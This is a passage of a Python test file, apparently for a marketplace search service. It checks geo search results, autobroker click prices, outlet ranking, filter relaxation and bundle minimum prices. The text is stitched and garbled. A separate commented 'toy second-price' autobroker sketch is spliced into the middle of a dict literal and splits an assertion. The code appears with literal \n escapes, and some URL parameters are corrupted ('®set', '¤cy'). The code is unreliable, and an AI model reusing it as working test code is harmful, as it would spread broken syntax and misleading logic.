'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=10&text=kayak&rids=1®set=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 
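# Every autobroker expectation in these tests logs cb=1 and cp=1: each offer
# is "propped up" (подпертый) by the next one at the same minimal bid, so the
# billed click price stays at the minimum. A toy second-price sketch of that
# idea -- pay just enough to beat the offer below, never more than your own
# bid and never less than the minimum. The real autobroker is more involved;
# MIN_BID=1 is assumed from the cb=1/cp=1 expectations.
MIN_BID = 1


def autobroker_price(own_bid, next_bid=None):
    if next_bid is None:
        return MIN_BID  # nothing props this offer up -> minimum price
    return max(MIN_BID, min(own_bid, next_bid + 1))


assert autobroker_price(own_bid=1, next_bid=1) == 1
assert autobroker_price(own_bid=5) == 1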
10, \"shops\": 4, \"shopOutlets\": 10}})\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 3_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 5_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 3_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n ],\n preserve_order=True,\n allow_different_len=False,\n )\n\n def test_geo_text_search_autobroker_head(self):\n '''Что тестируем: автоброкер как на поиске, для первого цикла по офферам'''\n _ = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&text=kayak&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n )\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1104, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n def test_geo_text_search_autobroker_tail(self):\n '''Что тестируем: автоброкер как на поиске, для второго цикла по офферам'''\n _ = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&page=2&text=kayak&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n )\n # 1ый оффер подпертый 3им, оффер из CPA категории\n\n # 3ий оффер подпертый 4ым, оффер из CPA категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер не подпертый, оффер из CPC категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 1ый оффер подпертый 4ым, оффер из CPA категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1).times(2)\n\n def test_geo_category_search_cpc_autobroker_head(self):\n '''Что тестируем: автоброкер для категорийной выдачи, для первого цикла по офферам, категория CPC'''\n _ = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&hid=3002&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n '&rearr-factors=market_use_books_pessimization=1'\n )\n # 1ый оффер подпертый 3им\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n # 3ий оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер подпертый 5ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 5ый оффер, не подпертый\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1104, cb=1, cp=1)\n\n def test_geo_category_search_cpc_autobroker_tail(self):\n '''Что тестируем: автоброкер для категорийной выдачи, для второго цикла по офферам, категория CPC'''\n _ = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&page=2&hid=3002&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n 
'&rearr-factors=market_use_books_pessimization=1'\n )\n # 1ый оффер подпертый 3им\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n # 3ий оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер не подпертый\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 1ый оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n def test_geo_search_outlet_ranking(self):\n '''Что тестируем: сортировку аутлетов по растоянию на поиске'''\n response = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=10&text=kayak&rids=1®set=1&fesh=1101'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1211\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1214\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1212\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1213\"}},\n ],\n preserve_order=True,\n allow_different_len=False,\n )\n\n @classmethod\n def prepare_clicks_for_fixtariff_shop_in_geo(cls):\n cls.index.hypertree += [HyperCategory(hid=700, output_type=HyperCategoryType.GURU)]\n cls.index.models += [\n Model(hyperid=3010, title='model for fix tariff', hid=700),\n ]\n cls.index.shops += [\n Shop(fesh=702, home_region=225, tariff=\"FIX\", online=False),\n ]\n cls.index.outlets += [\n Outlet(point_id=702, fesh=702, region=213, point_type=Outlet.FOR_PICKUP),\n ]\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=8001,\n fesh=702,\n carriers=[99],\n options=[PickupOption(outlet_id=702)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n cls.index.offers += [\n Offer(hyperid=3010, fesh=702, title='offer for fix tariff', pickup_buckets=[8001]),\n ]\n\n def test_clicks_for_fixtariff_shop_in_geo(self):\n for pp in [24, 25, 26, 27]:\n _ = self.report.request_json('place=geo&hyperid=3010&rids=213&show-urls=geo&pp={}'.format(pp))\n self.click_log.expect(ClickType.GEO, shop_id=702, cb=0, cp=0).times(4)\n\n @classmethod\n def prepare_filters_ignorance_test(cls):\n \"\"\"\n Создаем магазины и аутлеты, а также 5 офферов.\n\n Один из офферов подходит под все фильтры из таблицы\n https://wiki.yandex-team.ru/users/msheglov/Kontekstnost-vydachi/#filtrytretegotipa\n\n Три оффера не подходят под один из фильтров shops, book-now и offer-shipping и все\n они CPA_NO\n\n Еще один не подходит под эти фильтры, за исключением cpa, shops, book-now и\n offer-shipping\n \"\"\"\n cls.index.shops += [\n Shop(fesh=18001, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(fesh=18002, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(fesh=18003, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(fesh=18004, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(fesh=18005, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=3.0), home_region=10),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=18201, fesh=18001, region=213, point_type=Outlet.FOR_STORE),\n Outlet(point_id=18202, fesh=18002, region=213, point_type=Outlet.FOR_STORE),\n Outlet(point_id=18203, fesh=18003, region=213, point_type=Outlet.FOR_STORE),\n Outlet(point_id=18204, fesh=18004, region=213, point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=18205, fesh=18005, region=213, point_type=Outlet.FOR_STORE),\n ]\n\n cls.index.pickup_buckets += [\n 
PickupBucket(\n bucket_id=9001,\n fesh=18001,\n carriers=[99],\n options=[PickupOption(outlet_id=18201)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9002,\n fesh=18002,\n carriers=[99],\n options=[PickupOption(outlet_id=18202)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9003,\n fesh=18003,\n carriers=[99],\n options=[PickupOption(outlet_id=18203)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9004,\n fesh=18004,\n carriers=[99],\n options=[PickupOption(outlet_id=18204)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9005,\n fesh=18005,\n carriers=[99],\n options=[PickupOption(outlet_id=18205)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n booking1 = BookingAvailability(outlet_id=18201, region_id=213, amount=15)\n booking2 = BookingAvailability(outlet_id=18202, region_id=213, amount=15)\n _ = BookingAvailability(outlet_id=18203, region_id=213, amount=15)\n booking4 = BookingAvailability(outlet_id=18204, region_id=213, amount=15)\n booking5 = BookingAvailability(outlet_id=18205, region_id=213, amount=15)\n\n cls.index.offers += [\n Offer(\n hyperid=18101,\n fesh=18001,\n title='ideal-offer',\n price_old=150,\n booking_availabilities=[booking1],\n delivery_options=[\n DeliveryOption(price=0, day_from=1, day_to=1),\n ],\n pickup_buckets=[9001],\n ),\n Offer(\n hyperid=18101,\n fesh=18002,\n title='no-cpa-filtered-shop',\n price_old=150,\n booking_availabilities=[booking2],\n pickup_buckets=[9002],\n ),\n Offer(hyperid=18101, fesh=18003, title='no-cpa-without-book-now', price_old=150, pickup_buckets=[9003]),\n Offer(\n hyperid=18101,\n fesh=18004,\n title='no-cpa-no-store',\n price_old=150,\n store=False,\n booking_availabilities=[booking4],\n pickup_buckets=[9004],\n ),\n Offer(\n hyperid=18101,\n fesh=18005,\n title='almost-ideal-offer',\n price=900,\n manufacturer_warranty=False,\n booking_availabilities=[booking5],\n delivery_options=[\n DeliveryOption(price=100, day_from=1, day_to=5),\n ],\n pickup_buckets=[9005],\n ),\n ]\n\n def test_geo_without_filters(self):\n \"\"\"\n What we test: a geo request for offers without explicitly specified filters\n returns all offers of the model\n\n Request offers on geo without filters for model 18101\n Expect 5 offers to be returned\n \"\"\"\n response = self.report.request_json('place=geo&hyperid=18101&numdoc=20&rids=213')\n self.assertFragmentIn(response, {\"search\": {\"total\": 5}})\n self.assertEqual(response.count({\"entity\": \"offer\"}), 5)\n\n def test_geo_with_filters(self):\n \"\"\"\n What we test: a geo request for offers with explicitly specified filters\n filters out all offers except the \"ideal\" one\n\n Request offers on the offers page with filters for model 18101\n Expect a single \"ideal\" offer to be returned\n \"\"\"\n response = self.report.request_json('place=geo&hyperid=18101&numdoc=20&rids=213%s' % SEARCH_FILTERS)\n self.assertFragmentIn(response, {\"search\": {\"total\": 1}})\n self.assertEqual(response.count({\"entity\": \"offer\"}), 1)\n self.assertFragmentIn(response, {\"titles\": {\"raw\": \"ideal-offer\"}})\n\n def test_geo_with_filters_ignorance(self):\n \"\"\"\n What we test: a request for offers on the offers page with explicitly specified filters\n and the &relax-filters=1 flag ignores the filters, except for cpa, shops, book-now and\n offer-shipping\n\n Request offers on the offers page with filters for model 18101\n and the flag 
&relax-filters=1\n Ожидаем, что возвращается 2 оффера - \"идеальный\" и тот, который подходит под все\n фильтры, кроме игнорируемых\n \"\"\"\n response = self.report.request_json(\n 'place=geo&hyperid=18101&numdoc=20&rids=213&relax-filters=1%s' % SEARCH_FILTERS\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 2}})\n self.assertEqual(response.count({\"entity\": \"offer\"}), 2)\n self.assertFragmentIn(response, {\"titles\": {\"raw\": \"ideal-offer\"}})\n self.assertFragmentIn(response, {\"titles\": {\"raw\": \"almost-ideal-offer\"}})\n\n @classmethod\n def prepare_attraction(cls):\n cls.index.models += [\n Model(hyperid=2102, hid=2002),\n ]\n cls.index.offers += [\n Offer(hyperid=2102, title='1_from_2102', bid=500, fesh=1101, pickup_buckets=[7001]),\n Offer(hyperid=2102, title='2_from_2102', bid=400, fesh=1105, pickup_buckets=[7005]), # Out of sight\n Offer(hyperid=2102, title='3_from_2102', bid=300, fesh=1102, pickup_buckets=[7002]),\n Offer(hyperid=2102, title='4_from_2102', bid=200, fesh=1103, pickup_buckets=[7003]),\n Offer(hyperid=2102, title='5_from_2102', bid=100, fesh=1104, pickup_buckets=[7004]),\n ]\n\n @staticmethod\n def __create_attraction_point_request(geoLocation=None, userId=None, addBounds=True, addDebug=True, how=None):\n request = 'place=geo&rids=1&hyperid=2102&geo-attraction-distance=7000' # Расстояние 7000м - требуется для тестовых координат. 2000м, заданных по умолчанию мало.\n if how is not None:\n request += '&how={}'.format(how)\n if addDebug:\n request += '&debug=da'\n if geoLocation is not None:\n request += '&geo-location={}'.format(geoLocation)\n if addBounds:\n request += '&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n if userId is not None:\n request += '&puid={}'.format(userId)\n\n return request\n\n def __test_add_attraction_point(self, response, name, coord):\n # Проверка добавления точки притяжения\n # TODO Добавить проверку координат после исправления GeoPoint (перепутаны широта с долготой). 
https://st.yandex-team.ru/MARKETOUT-12400\n # addText = 'Add attraction point: {}: {}'.format(name, coord)\n addText = 'Add attraction point: {}:'.format(name)\n self.assertFragmentIn(response, {'logicTrace': [Contains(addText)]})\n\n def __test_missed_attraction_point(self, response, name=None, coord=None):\n # Check that the attraction point was not added\n missedText = 'Add attraction point: '\n if name is not None:\n missedText += '{}:'.format(name)\n # TODO Add a coordinate check once GeoPoint is fixed (latitude and longitude are swapped)\n # if coord is not None:\n # missedText += ' {}'.format(coord)\n self.assertFragmentNotIn(response, {'logicTrace': [Contains(missedText)]})\n\n def __test_filter_attraction_point(self, response, name, coord):\n # Check that an attraction point that did not fall into the window is filtered out\n # TODO Add a coordinate check once GeoPoint is fixed (latitude and longitude are swapped)\n # filterText = 'Attraction point filtered by geo-bounds: {}: {}'.format(name, coord)\n filterText = 'Attraction point filtered by geo-bounds: {}:'.format(name)\n self.__test_missed_attraction_point(response, name)\n self.assertFragmentIn(response, {'logicTrace': [Contains(filterText)]})\n\n def test_cgi_param_attraction_points(self):\n '''\n What we test: attraction points passed via parameters are added\n '''\n response = self.report.request_json(\n self.__create_attraction_point_request(geoLocation=LOCATION_GPS_COORD)\n + '&geo-attraction={}'.format(FAR_GPS_COORD)\n + '&geo-attraction={}'.format(HOME_GPS_COORD)\n )\n self.__test_add_attraction_point(response, 'cgi-param', FAR_GPS_COORD)\n self.__test_add_attraction_point(response, 'cgi-param', HOME_GPS_COORD)\n\n def assert_equal_json_responses_without_click_urls(self, request1, request2):\n self.assertEqualJsonResponses(request1, request2)\n\n def __test_ranking_with_attraction_points(self, request, outletsOrder):\n # Request the full list\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n [{\"entity\": \"offer\", \"outlet\": {\"id\": \"{}\".format(outlet_id)}} for outlet_id in outletsOrder],\n preserve_order=True,\n allow_different_len=False,\n )\n\n # Check that the order is preserved when paginating\n for i in [1, 10]:\n response = self.report.request_json(request + '&numdoc=1&page={}'.format(i))\n self.assertFragmentIn(\n response,\n [{\"entity\": \"offer\", \"outlet\": {\"id\": \"{}\".format(outletsOrder[i - 1])}}],\n preserve_order=True,\n allow_different_len=False,\n )\n\n def test_offer_shipping_delivery(self):\n # What we test: a request with offer-shipping=delivery ignores this filter\n # and returns outlets of the pickup and store types\n response = self.report.request_json('place=geo&offer-shipping=delivery&hid=501&rids=0')\n self.assertFragmentIn(response, {\"outlet\": {\"type\": \"pickup\"}})\n self.assertFragmentIn(response, {\"outlet\": {\"type\": \"store\"}})\n\n def test_multiple_point_id(self):\n \"\"\"Check that the &point_id filter with multiple values works correctly\"\"\"\n response = self.report.request_json('place=geo&text=good11&rids=1&point_id=212,214,215')\n self.assertFragmentIn(\n response,\n {\n \"total\": 3,\n \"results\": [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"215\"}},\n ],\n },\n )\n self.assertEqual(3, response.count({\"outlet\": {}}))\n\n @classmethod\n def prepare_bundle_min_price(cls):\n cls.index.hypertree += [\n 
HyperCategory(hid=730),\n HyperCategory(hid=731),\n HyperCategory(hid=732),\n ]\n cls.index.models += [\n Model(hyperid=73, hid=730),\n Model(hyperid=74, hid=730),\n Model(hyperid=75, hid=731),\n Model(hyperid=76, hid=732),\n ]\n cls.index.shops += [\n Shop(fesh=7301, priority_region=1, name='Shop_7301'),\n Shop(fesh=7302, priority_region=1, name='Shop_7302'),\n Shop(fesh=7303, priority_region=1),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=7301, fesh=7301, region=1, gps_coord=GpsCoord(37.1, 55.1)),\n Outlet(point_id=7302, fesh=7302, region=1, gps_coord=GpsCoord(37.1, 55.1)),\n Outlet(point_id=7303, fesh=7303, region=1, gps_coord=GpsCoord(30.0, 50.0)),\n Outlet(point_id=7304, fesh=7304, region=1, gps_coord=GpsCoord(30.1, 50.1)),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=9101,\n fesh=7301,\n carriers=[99],\n options=[PickupOption(outlet_id=7301)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9102,\n fesh=7302,\n carriers=[99],\n options=[PickupOption(outlet_id=7302)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9103,\n fesh=7303,\n carriers=[99],\n options=[PickupOption(outlet_id=7303)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9104,\n fesh=7304,\n carriers=[99],\n options=[PickupOption(outlet_id=7304)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.offers += [\n Offer(hyperid=73, title='1_73_shop1', price=123, fesh=7301, pickup_buckets=[9101]),\n Offer(hyperid=73, title='2_73_shop1', price=126, fesh=7301, pickup_buckets=[9101]),\n Offer(hyperid=73, title='3_73_shop1', price=120, fesh=7301, pickup_buckets=[9101]),\n Offer(hyperid=74, title='1_74_shop1', price=140, fesh=7301, pickup_buckets=[9101]),\n Offer(hyperid=74, title='2_74_shop2', price=274.1, fesh=7302, pickup_buckets=[9102]),\n # To check that offers from other categories are not included in the minimum price\n Offer(hid=731, hyperid=75, title='telephone 1', price=456, fesh=7303, pickup_buckets=[9103], randx=100),\n Offer(hid=731, hyperid=75, title='telephone 2', price=420, fesh=7303, pickup_buckets=[9103], randx=100),\n Offer(hid=732, hyperid=76, title='telephone 3', price=410, fesh=7303, pickup_buckets=[9103], randx=1),\n Offer(hid=732, hyperid=76, title='telephone 4', price=440, fesh=7303, pickup_buckets=[9103], randx=1),\n Offer(hid=731, hyperid=75, title='telephone 5', price=100, fesh=7304, pickup_buckets=[9104], randx=100),\n Offer(hid=732, hyperid=76, title='telephone 6', price=101, fesh=7304, pickup_buckets=[9104], randx=1),\n ]\n cls.index.currencies = [\n Currency(\n name=Currency.BYN,\n exchange_rates=[\n ExchangeRate(to=Currency.RUR, rate=0.5),\n ],\n ),\n ]\n\n def test_bundle_min_price_in_category(self):\n \"\"\"\n Check that for a given offer the minimum price is computed over offers from the same shop and from the offer's category,\n and also that the count of offers from the same shop includes only offers from the given offer's category\n \"\"\"\n\n response = self.report.request_json(\n 'place=geo&geo-location=30.0,50.0&geo_bounds_lb=29.9,49.9&geo_bounds_rt=30.2,50.2&text=telephone&rids=1'\n )\n\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"telephone 1\"},\n \"bundled\": {\n \"shopCategory\": {\n \"minPrice\": {\"value\": \"420\"},\n \"count\": 2,\n },\n \"count\": 4,\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"telephone 5\"},\n \"bundled\": {\n \"shopCategory\": {\n 
\"minPrice\": {\"value\": \"100\"},\n \"count\": 1,\n },\n \"count\": 2,\n },\n },\n ],\n )\n\n \"\"\"\n Проверяем, что при задании конкретной точки на карте отдается 'bundled'\n \"\"\"\n response = self.report.request_json(\"place=geo&point_id=7302&text=_shop\")\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"bundled\": {\n \"shopCategory\": {\n \"minPrice\": {\n \"value\": \"274\",\n },\n \"count\": 1,\n }\n },\n }\n ],\n )\n\n def test_bundle_min_price_BYN(self):\n \"\"\"\n Проверяем, что минимальная цена считается правильно (в валюте пользователя)\n \"\"\"\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&text=_shop&rids=0¤cy=BYN'\n )\n\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"bundleCount\": 4,\n \"bundled\": {\n \"count\": 4,\n \"shopCategory\": {\n \"count\": 4,\n \"minPrice\": {\n \"currency\": \"BYN\",\n \"value\": \"240\",\n },\n },\n },\n },\n {\n \"entity\": \"offer\",\n \"bundleCount\": 1,\n \"bundled\": {\n \"count\": 1,\n \"shopCategory\": {\n \"count\": 1,\n \"minPrice\": {\n \"currency\": \"BYN\",\n \"value\": \"548.2\",\n },\n },\n },\n },\n ],\n )\n\n def test_bundle_min_price_RUB(self):\n \"\"\"\n Проверяем, что минимальная цена считается правильно\n \"\"\"\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&text=_shop&rids=0'\n )\n\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"bundleCount\": 4,\n \"bundled\": {\n \"count\": 4,\n \"shopCategory\": {\n \"count\": 4,\n \"minPrice\": {\n \"currency\": \"RUR\",\n \"value\": \"120\",\n },\n },\n },\n },\n {\n \"entity\": \"offer\",\n \"bundleCount\": 1,\n \"bundled\": {\n \"count\": 1,\n \"shopCategory\": {\n \"count\": 1,\n \"minPrice\": {\n \"currency\": \"RUR\",\n \"value\": \"274\",\n },\n },\n },\n },\n ],\n )\n\n @classmethod\n def prepare_cpa_no_offers_with_delivery_service_on_geo(cls):\n cls.index.shops += [\n Shop(\n fesh=17000,\n priority_region=2,\n name='Shop17000',\n delivery_service_outlets=[17002],\n )\n ]\n\n cls.index.outlets += [\n Outlet(\n point_id=17002,\n delivery_service_id=17001,\n region=4,\n point_type=Outlet.FOR_PICKUP,\n delivery_option=OutletDeliveryOption(\n shipper_id=103, day_from=1, day_to=1, order_before=2, work_in_holiday=True, price=100\n ),\n working_days=[i for i in range(10)],\n gps_coord=GpsCoord(lon=37.12, lat=55.32),\n ),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=9201,\n carriers=[17001],\n options=[PickupOption(outlet_id=17002)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.offers += [Offer(fesh=17000, title='NoneCpaOfferWithOutlet', hyperid=17003, pickup_buckets=[9201])]\n\n def test_cpa_no_offers_with_delivery_service_on_geo_in_param_how(self):\n \"\"\"\n Что тестируем: показ на geo не СРА офера, имеющего точки ПВЗ от служб доставки\n \"\"\"\n for extra in ['', '&how=model_card']:\n response = self.report.request_json(\n 'place=geo&hyperid=17003&fesh=17000&rids=4&show-urls=geo&geo_bounds_rt=37.30%2C56.2&geo_bounds_lb=37.0%2C55.1&geo-location=37.1%2C55.15'\n + extra\n )\n self.assertFragmentIn(\n response,\n {'results': [{'entity': 'offer', 'titles': {'raw': 'NoneCpaOfferWithOutlet'}}]},\n allow_different_len=False,\n )\n\n def test_cpa_no_offers_with_delivery_service_on_geo(self):\n \"\"\"\n Что тестируем: показ на geo не СРА офера, имеющего точки ПВЗ от служб доставки\n \"\"\"\n for extra in ['', 
'&default-how-on-geo=model_card']:\n response = self.report.request_json(\n 'place=geo&hyperid=17003&fesh=17000&rids=4&show-urls=geo&geo_bounds_rt=37.30%2C56.2&geo_bounds_lb=37.0%2C55.1&geo-location=37.1%2C55.15'\n + extra\n )\n self.assertFragmentIn(\n response,\n {'results': [{'entity': 'offer', 'titles': {'raw': 'NoneCpaOfferWithOutlet'}}]},\n allow_different_len=False,\n )\n\n @classmethod\n def prepare_not_only_top_offer_outlets(cls):\n \"\"\"\n Для проверки отображения точек магазина, в которых нет самого \"релевантного\" оффера,\n создаём магазин с тремя офферами и тремя аутлетами.\n Каждый оффер продаётся только в одном аутлете. Сами офферы определены в классе _Offers.\n \"\"\"\n cls.index.shops += [Shop(fesh=12320, priority_region=213, delivery_service_outlets=[12323])]\n\n cls.index.outlets += [\n Outlet(\n point_id=12321, fesh=12320, region=213, point_type=Outlet.FOR_STORE, gps_coord=GpsCoord(37.12, 55.32)\n ),\n Outlet(\n point_id=12322, fesh=12320, region=213, point_type=Outlet.FOR_PICKUP, gps_coord=GpsCoord(38.12, 54.67)\n ),\n Outlet(\n point_id=12323,\n region=213,\n point_type=Outlet.FOR_POST_TERM,\n delivery_service_id=1030,\n gps_coord=GpsCoord(36.19, 56.1),\n delivery_option=OutletDeliveryOption(price=10),\n ),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=9301,\n fesh=12320,\n carriers=[99],\n options=[PickupOption(outlet_id=12321, price=0), PickupOption(outlet_id=12322, price=0)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9302,\n carriers=[1030],\n options=[PickupOption(outlet_id=12323, price=10)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.offers += [_Offers.pickup_offer, _Offers.store_offer, _Offers.post_term_offer]\n\n def test_not_only_top_offer_outlets(self):\n \"\"\"\n Проверка того, что на выдаче отображаются не только точки магазина, соответствующие\n наиболее релевантному документу.\n \"\"\"\n geo_request = (\n 'place=geo&rids=213&require-geo-coords=1&fesh=12320'\n '&tile=153%2C79&tile=153%2C80&tile=153%2C81&tile=154%2C79&tile=154%2C80&tile=154%2C81'\n '&tile=155%2C79&tile=155%2C80&tile=155%2C81&tile=156%2C79&tile=156%2C80&tile=156%2C81'\n '&zoom=8&ontile=5'\n )\n geo_tiles = geo_request + '&show-outlet=tiles'\n geo_offers = geo_request + '&show-outlet=offers'\n\n TestOutlet = namedtuple('Outlet', ['coord', 'id', 'type'])\n\n def as_tile(outlet):\n return {\"coord\": outlet.coord, \"outlets\": [{\"id\": str(outlet.id), \"type\": outlet.type}]}\n\n outlet_store = TestOutlet(coord={\"x\": 154, \"y\": 80, \"zoom\": 8}, id=12321, type='store')\n outlet_pickup = TestOutlet(coord={\"x\": 155, \"y\": 81, \"zoom\": 8}, id=12322, type='pickup')\n outlet_post_term = TestOutlet(coord={\"x\": 153, \"y\": 79, \"zoom\": 8}, id=12323, type='pickup')\n\n test_outlets = (outlet_store, outlet_pickup, outlet_post_term)\n test_offers = (_Offers.store_offer, _Offers.pickup_offer, _Offers.post_term_offer)\n\n # Проверяем, что по отдельности для каждого оффера доступна доставка только в один аутлет\n for offer, offer_outlet in zip(test_offers, test_outlets):\n tiles_response = self.report.request_json(geo_tiles + '&hyperid=' + offer.hyperid)\n for outlet in test_outlets:\n if outlet == offer_outlet:\n self.assertFragmentIn(tiles_response, {\"search\": {\"tiles\": [as_tile(outlet)]}})\n else:\n self.assertFragmentNotIn(tiles_response, {\"search\": {\"tiles\": [as_tile(outlet)]}})\n\n # И такая же проверка для варианта с запросом офферов\n offers_response = self.report.request_json(geo_offers 
+ '&offerid=' + offer.ware_md5)\n self.assertFragmentIn(\n offers_response,\n {\n \"search\": {\n \"results\": [\n {\n \"entity\": \"offer\",\n \"outlet\": {\"entity\": \"outlet\", \"id\": str(offer_outlet.id), \"type\": offer_outlet.type},\n }\n ]\n }\n },\n allow_different_len=False,\n )\n\n # Для запроса без указания модели комбинациями флажков получаются все доступные точки магазина\n shop_response = self.report.request_json(geo_tiles)\n self.assertFragmentIn(shop_response, {\"search\": {\"tiles\": [as_tile(o) for o in test_outlets]}})\n\n @classmethod\n def prepare_mega_points(cls):\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=2300,\n carriers=[270],\n options=[PickupOption(outlet_id=12345670, price=100)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=2301,\n carriers=[270],\n options=[PickupOption(outlet_id=12345671, price=100)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=2302,\n options=[PickupOption(outlet_id=12345672, price=100)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.shops += [\n Shop(fesh=73001, regions=[1], delivery_service_outlets=[12345670, 12345671]),\n Shop(fesh=73002, regions=[1], delivery_service_outlets=[12345670, 12345671]),\n Shop(fesh=73003, 